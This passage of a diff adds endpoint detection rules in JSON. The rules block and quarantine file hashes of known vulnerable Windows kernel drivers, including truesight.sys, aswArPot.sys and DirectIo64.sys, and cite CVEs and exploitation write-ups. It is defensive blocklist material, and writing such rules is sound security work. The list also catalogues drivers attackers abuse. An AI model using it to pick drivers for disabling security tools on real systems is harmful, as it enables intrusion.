"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608794Z", + "creation_date": "2026-03-23T11:45:29.608796Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608801Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "681de794238060ec929aa5cf6c4701069f113a8524d31fb2f411648968ca17de", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5f9adcba-9259-5e4d-8c35-c77d2331f244", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823621Z", + "creation_date": "2026-03-23T11:45:31.823624Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823629Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eb911ee38ebbc680eb44299e9e50f92d8995ddaa1070b3c23a71ab0566940b25", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5fab89d7-37d3-5020-86ac-8476a39553c9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141981Z", + "creation_date": "2026-03-23T11:45:31.141983Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141989Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8447afc11fdb3664885c026edc07fb909bf7ca62633b1c20d3c82e52d8f03561", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5fae421e-afb7-5024-93b6-9ba5cb0654d0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.623007Z", + "creation_date": "2026-03-23T11:45:29.623009Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.623015Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "841f965977f33d621d126412032c47dd6118251623c380e5572f7553b620b0e1", + "comment": "PassMark vulnerable driver (aka DirectIo32.sys and DirectIo64.sys) [CVE-2020-15479] [https://github.com/eset/vulnerability-disclosures/blob/master/CVE-2020-15479/CVE-2020-15479.md] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5fb8513c-3766-515c-9275-61c56137ac4b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621141Z", + "creation_date": "2026-03-23T11:45:29.621143Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621148Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "ca829178d01990c8d1d6a681dee074a53f0dd873fd8eef6f6161c682449ec8c5", + "comment": "CoreTemp Physmem dangerous drivers (aka ALSYSIO64.sys) [https://www.loldrivers.io/drivers/4d365dd0-34c3-492e-a2bd-c16266796ae5/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5fc33fa3-e086-5c6c-9bb1-4714010406fb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.147095Z", + "creation_date": "2026-03-23T11:45:32.147097Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.147102Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7023f08c9f99076a5fb82a0f661847e2951800f095fca1793a0e6bd9c949b478", + "comment": "Vulnerable Kernel Driver (aka LnvMSRIO.sys) [https://blog.quarkslab.com/exploiting-lenovo-driver-cve-2025-8061.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5fd219e9-384c-5fa2-9845-c28f5c443fe8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982836Z", + "creation_date": "2026-03-23T11:45:29.982838Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982843Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "358ac54be252673841a1d65bfc2fb6d549c1a4c877fa7f5e1bfa188f30375d69", + "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5fd41a6c-ea33-5f24-a582-91dd75cb4d70", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620583Z", + "creation_date": "2026-03-23T11:45:29.620585Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.620590Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5fe8dc0f-9e92-513d-bf3e-d39153e5ebd1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.606523Z", + "creation_date": "2026-03-23T11:45:29.606525Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.606530Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6b3316496ab1e2d1ef02be966d9caa171674856e8fb8ea78d6a3bcfe8e2013c1", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "5ffa9f62-fbf7-5ef5-b8b5-df5b43aa16a8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.969966Z", + "creation_date": "2026-03-23T11:45:29.969968Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + 
"hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.969973Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e27fa56ceff3fe7d5a723c5f4192ce6aa16994f88cf05935645f9e398292376a", + "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6001705e-4220-5a9d-87c8-c940b75a2728", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828405Z", + "creation_date": "2026-03-23T11:45:31.828407Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828413Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ae986d6d28875a3f0ded62b1bea8b09420964eadda0f84aaae883e40ef392fd0", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60048928-7e6a-52a4-8486-d55184a0048b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": 
"quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975220Z", + "creation_date": "2026-03-23T11:45:29.975222Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975227Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "35b31c96194d78cbb98b3223bf810f78f53fc0e4601f49169938ca883586e4e9", + "comment": "Vulnerable Kernel Driver (aka HpPortIox64.sys) [https://www.loldrivers.io/drivers/13637210-2e1c-45a4-9f76-fe38c3c34264/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60086cd4-7cde-51d8-8461-b95a5f620ceb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491089Z", + "creation_date": "2026-03-23T11:45:31.491092Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491101Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": 
"hash", + "value": "66ead034234c85988239b0c0bf96d68bb56366cd85c6695e7c586f2c5823842c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "600c166f-e365-55ce-b204-4a4d3a689e09", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.151246Z", + "creation_date": "2026-03-23T11:45:31.151248Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.151254Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a28f047f3fdd96e3a917dc99e106ae9fd4fd96b5671d9fa43b752e1ae7e5100e", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "601e47b5-689d-5e7f-9cb7-c554a7d31d68", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977881Z", + "creation_date": "2026-03-23T11:45:29.977883Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977889Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c67c6f1e03a466dc660bcad6051fc38eb6e9004a4e252abe52c6155f5768ad90", + "comment": "Vulnerable Kernel Driver (aka driver7-x86.sys) [https://www.loldrivers.io/drivers/670dc258-78b5-4552-a16b-b41917c86f8d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6037a93e-6a54-5951-a11a-a1c3160df731", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.493115Z", + "creation_date": "2026-03-23T11:45:31.493119Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.493127Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e62b11cb14eca6a3c9ceb6f3f5741149742896f7dbb4b3407aa82e3412a34b3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka 
truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60402990-c588-5a24-9145-6e98acbb5dc4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.967784Z", + "creation_date": "2026-03-23T11:45:29.967789Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.967805Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c56536f99207915e5a1f7d4f014ab942bd820e64ff7f371ad0462ef26ed27242", + "comment": "Vulnerable Kernel Driver (aka Netfilter.sys) [https://www.loldrivers.io/drivers/9454a752-233e-4ba2-b585-8da242bf8f31/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "604175a8-026a-5913-82ce-e543b717b4d7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477355Z", + "creation_date": "2026-03-23T11:45:31.477358Z", + 
"enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477368Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7b51ba453918a897d18315213c105381151953edfec0850e9b01f66b2467d7b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6046e592-5933-587f-925d-bcf81eb61275", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.159385Z", + "creation_date": "2026-03-23T11:45:31.159387Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.159393Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd80868d5010f97bd3426ff87326cfd01939e0c45fd3b27eb5a2028311ab1b1d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"604a9c8b-ed6e-5a36-8cfc-5cf1859f7fe3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.823663Z", + "creation_date": "2026-03-23T11:45:30.823665Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.823671Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8b37cb203f790c11c291988871e3cfe34fe35cfa684c7c55b78934790f83d51c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "604d9045-d619-559c-9b8c-d5c4bc10cbbb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.620658Z", + "creation_date": "2026-03-23T11:45:29.620660Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.620665Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457", + "comment": "IBM Vulnerable Physmem drivers (aka citmdrv_amd64.sys and citmdrv_ia64.sys) [https://www.loldrivers.io/drivers/0f21a584-6ace-4242-82cb-9766cea6973a/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6056d1ba-dbd8-5e72-bcfd-52dd4a9a2d00", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.825041Z", + "creation_date": "2026-03-23T11:45:30.825045Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.825055Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c3988a428a3439452164edbf1abff6fabf257c97ab693f5a5c8149fc2fc17ca3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "60578438-f2cb-5103-ad69-a8b2c9b13452", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476629Z", + "creation_date": "2026-03-23T11:45:31.476632Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476642Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a7cdda07837e62957e20d91d97c82c5ce11b3f35aa6b7ec482841628e2c81b46", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "605b193d-03a4-519c-bf0b-bf171a2dbab7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500336Z", + "creation_date": "2026-03-23T11:45:31.500339Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500347Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "453e715f79a5c8b9c8222232b665a2cc60ab054a64685d402cd414ce7255eb65", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6070e473-0150-5486-86d8-8d5143e1ed35", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.820900Z", + "creation_date": "2026-03-23T11:45:31.820904Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.820913Z", 